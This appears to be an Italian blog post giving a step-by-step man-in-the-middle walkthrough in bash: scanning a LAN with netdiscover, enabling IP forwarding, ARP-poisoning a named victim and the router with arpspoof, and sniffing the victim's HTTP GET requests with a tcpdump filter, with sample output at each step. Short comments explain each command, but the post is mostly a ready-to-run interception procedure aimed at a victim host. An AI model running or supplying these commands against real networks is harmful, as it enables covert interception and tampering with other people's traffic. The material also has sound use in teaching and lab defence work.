MITM - bash

MITM - bash
LOG.004

Tags
bugs
By AKIRA BASHO il 25 Nov. 2022

0 Comments 68 Views
.

attacco man in the middle (spesso abbreviato in mitm, mim, mim attack o mitma, in italiano "uomo nel mezzo") è una terminologia impiegata nella crittografia e nella sicurezza informatica per indicare un attacco informatico in cui qualcuno segretamente ritrasmette o altera la comunicazione tra due parti che credono di comunicare direttamente tra di loro;

sudo netdiscover

;netdiscover scansiona le reti alla ricerca di host attivi attraverso le richieste ARP; si può utilizzare anche con l'opzione -r per passargli un particolare range di rate; es. 192.168.1.0/24

Currently scanning: Finished! | Screen View: Unique Hosts

5 Captured ARP Req/Rep packets, from 4 hosts. Total size: 210
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.1.1 20:b0:01:20:1f:54 1 42 VendorA
192.168.1.3 de:ce:a2:75:cc:cb 1 42 Unknown vendor
192.168.1.9 f0:7b:cb:18:02:24 1 42 VendorB
192.168.1.254 22:b0:01:20:1f:54 2 84 Unknown vendor

--------------------

re@REBOP:~$ arp -e

;arp -e lista la ARP Table che contiene le associazioni ip <--> MAC

Indirizzo TipoHW IndirizzoHW Flag Maschera Interfaccia
192.168.1.9 ether f0:7b:cb:18:02:24 C wlp0s20f3
192.168.1.1 ether 20:b0:01:20:1f:54 C wlp0s20f3

sudo echo 1 > /proc/sys/net/ipv4/ip_forward
sudo sysctl -w net.ipv4.ip_forward=1
net.ipv4.ip_forward = 1

;abilitiamo l'opzione che permette al nostro server di fare il forward dei pacchetti che riceve;

arpspoof -i eth0 -t <victim_ip> <router_ip>

;grazie ad arpspoof andiamo ad avvelenare le ARP table del pc vittima e del router; in questo modo invieranno ogni pacchetto all'host attacker;

sudo arpspoof -i wlp0s20f3 -t 192.168.1.9 192.168.1.1

98:43:fa:86:90:20 20:b0:1:20:1f:54 0806 42: arp reply 192.168.1.9 is-at 98:43:fa:86:90:20
98:43:fa:86:90:20 20:b0:1:20:1f:54 0806 42: arp reply 192.168.1.9 is-at 98:43:fa:86:90:20
98:43:fa:86:90:20 20:b0:1:20:1f:54 0806 42: arp reply 192.168.1.9 is-at 98:43:fa:86:90:20

sudo arpspoof -i wlp0s20f3 -t 192.168.1.1 192.168.1.9

98:43:fa:86:90:20 f0:7b:cb:18:2:24 0806 42: arp reply 192.168.1.1 is-at 98:43:fa:86:90:20
98:43:fa:86:90:20 f0:7b:cb:18:2:24 0806 42: arp reply 192.168.1.1 is-at 98:43:fa:86:90:20
98:43:fa:86:90:20 f0:7b:cb:18:2:24 0806 42: arp reply 192.168.1.1 is-at 98:43:fa:86:90:20

sudo tcpdump -i wlp0s20f3 -A 'tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x47455420' and src 192.168.1.9

tcpdump: verbose output suppressed, use -v[v]... for full protocol decode listening on wlp0s20f3, link-type EN10MB (Ethernet), snapshot length 262144 bytes

15:28:52.191479 IP 192.168.1.9.52962 > mil41s03-in-f4.1e100.net.http: Flags [P.], seq 854471767:854471908, ack 1349438441, win 229, options [nop,nop,TS val 249618292 ecr 220031208], length 141: HTTP: GET / HTTP/1.1
E...-.@.@...... ...D...P2.4WPn......;^.....
...t..h.GET / HTTP/1.1
User-Agent: Wget/1.20.1 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: www.google.com
Connection: Keep-Alive

;tcp[((tcp[12:1] & 0xf0) >> 2):4] questa opzione prima determina la location dei bytes a cui siamo interessati (dopo l'header TCP) e poi seleziona i 4 bytes che desideriamo matchare;

qui 0x47455420 rappresenta i valori ASCII dei caratteri 'G' 'E' 'T' ' '

Edited by Dr. Pepper - 30/10/2023, 12:16

Share

.

MITM - bashLOG.004

MITM - bash
LOG.004